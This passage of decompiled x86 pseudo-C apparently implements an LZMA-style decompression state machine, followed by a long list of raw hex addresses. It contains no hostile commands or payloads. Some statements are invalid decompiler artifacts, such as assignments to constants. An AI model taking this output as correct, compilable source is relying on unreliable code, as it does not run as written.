												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												goto L0;
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t258 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t258;
												0 | _t258 = _t258 + _t258 + 9;
												 *(__ebp - 0x38) = _t258 + _t258 + 9;
												goto L75;
											case 0xa:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xb;
													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x28);
												goto L88;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												L88:
												__ecx =  *(__ebp - 0x2c);
												 *(__ebp - 0x2c) = __eax;
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												L89:
												__eax =  *(__ebp - 4);
												 *(__ebp - 0x80) = 0x15;
												__eax =  *(__ebp - 4) + 0xa68;
												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
												goto L68;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												L68:
												_t614 =  *(_t621 - 0x58);
												 *(_t621 - 0x84) = 0x12;
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t621 - 0x88) = _t542;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t621 - 0x88) = _t542;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L79;
											case 0x1b:
												L75:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t274 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t274;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t283 = __ebp - 0x64;
												 *_t283 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t283;
												 *( *(__ebp - 0x68)) = __cl;
												L79:
												 *(__ebp - 0x14) = __edx;
												goto L80;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L80:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t544 = _t543 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}














                                                                                                                        0x00000000
                                                                                                                        0x00406ffe
                                                                                                                        0x00406ffe
                                                                                                                        0x00407002
                                                                                                                        0x00407023
                                                                                                                        0x0040702a
                                                                                                                        0x00407030
                                                                                                                        0x00407036
                                                                                                                        0x00407048
                                                                                                                        0x0040704e
                                                                                                                        0x00407053
                                                                                                                        0x00000000
                                                                                                                        0x00407004
                                                                                                                        0x0040700a
                                                                                                                        0x004073cb
                                                                                                                        0x004073cb
                                                                                                                        0x004073cb
                                                                                                                        0x004073ce
                                                                                                                        0x004073ce
                                                                                                                        0x004073ce
                                                                                                                        0x004073d4
                                                                                                                        0x004073da
                                                                                                                        0x004073e0
                                                                                                                        0x004073fa
                                                                                                                        0x004073fd
                                                                                                                        0x00407403
                                                                                                                        0x0040740e
                                                                                                                        0x00407410
                                                                                                                        0x004073e2
                                                                                                                        0x004073e2
                                                                                                                        0x004073f1
                                                                                                                        0x004073f5
                                                                                                                        0x004073f5
                                                                                                                        0x0040741a
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040741c
                                                                                                                        0x00407420
                                                                                                                        0x004075cf
                                                                                                                        0x004075e5
                                                                                                                        0x004075ed
                                                                                                                        0x004075f4
                                                                                                                        0x004075f6
                                                                                                                        0x004075fd
                                                                                                                        0x00407601
                                                                                                                        0x00407601
                                                                                                                        0x0040742c
                                                                                                                        0x00407433
                                                                                                                        0x0040743b
                                                                                                                        0x0040743e
                                                                                                                        0x00407441
                                                                                                                        0x00407441
                                                                                                                        0x00407447
                                                                                                                        0x00407447
                                                                                                                        0x00406be3
                                                                                                                        0x00406be3
                                                                                                                        0x00406be3
                                                                                                                        0x00406bec
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406bf2
                                                                                                                        0x00000000
                                                                                                                        0x00406bfd
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406c06
                                                                                                                        0x00406c09
                                                                                                                        0x00406c0c
                                                                                                                        0x00406c10
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406c16
                                                                                                                        0x00406c19
                                                                                                                        0x00406c1b
                                                                                                                        0x00406c1c
                                                                                                                        0x00406c1f
                                                                                                                        0x00406c21
                                                                                                                        0x00406c22
                                                                                                                        0x00406c24
                                                                                                                        0x00406c27
                                                                                                                        0x00406c2c
                                                                                                                        0x00406c31
                                                                                                                        0x00406c3a
                                                                                                                        0x00406c4d
                                                                                                                        0x00406c50
                                                                                                                        0x00406c5c
                                                                                                                        0x00406c84
                                                                                                                        0x00406c86
                                                                                                                        0x00406c94
                                                                                                                        0x00406c94
                                                                                                                        0x00406c98
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406c88
                                                                                                                        0x00406c88
                                                                                                                        0x00406c8b
                                                                                                                        0x00406c8c
                                                                                                                        0x00406c8c
                                                                                                                        0x00000000
                                                                                                                        0x00406c88
                                                                                                                        0x00406c62
                                                                                                                        0x00406c67
                                                                                                                        0x00406c67
                                                                                                                        0x00406c70
                                                                                                                        0x00406c78
                                                                                                                        0x00406c7b
                                                                                                                        0x00000000
                                                                                                                        0x00406c81
                                                                                                                        0x00406c81
                                                                                                                        0x00000000
                                                                                                                        0x00406c81
                                                                                                                        0x00000000
                                                                                                                        0x00406c9e
                                                                                                                        0x00406c9e
                                                                                                                        0x00406ca2
                                                                                                                        0x0040754e
                                                                                                                        0x00000000
                                                                                                                        0x0040754e
                                                                                                                        0x00406cab
                                                                                                                        0x00406cbb
                                                                                                                        0x00406cbe
                                                                                                                        0x00406cc1
                                                                                                                        0x00406cc1
                                                                                                                        0x00406cc1
                                                                                                                        0x00406cc4
                                                                                                                        0x00406cc8
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406cca
                                                                                                                        0x00406cd0
                                                                                                                        0x00406cfa
